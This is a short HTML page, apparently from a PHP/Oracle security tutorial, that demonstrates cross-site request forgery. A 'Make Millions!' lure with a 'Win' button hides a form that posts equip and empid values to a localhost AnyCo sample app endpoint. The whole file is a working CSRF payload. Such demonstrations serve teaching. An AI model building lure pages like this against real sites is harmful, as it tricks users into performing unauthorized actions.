<html>
<!-- hack.html: Show issues with CSRF -->
<body> 
	<h1>Make Millions!</h1>
	<form method='post' action='http://localhost/ORACLE-AnyCo%20App/ac_add_one.php'> 
		<div>Do you dream of being rich?<br>
			<input type="hidden" name="equip" value="fish">
			<input type="hidden" name="empid" value="100">
			<input type="submit" value="Win"> 
		</div> 
	</form> 
</body> 
</html>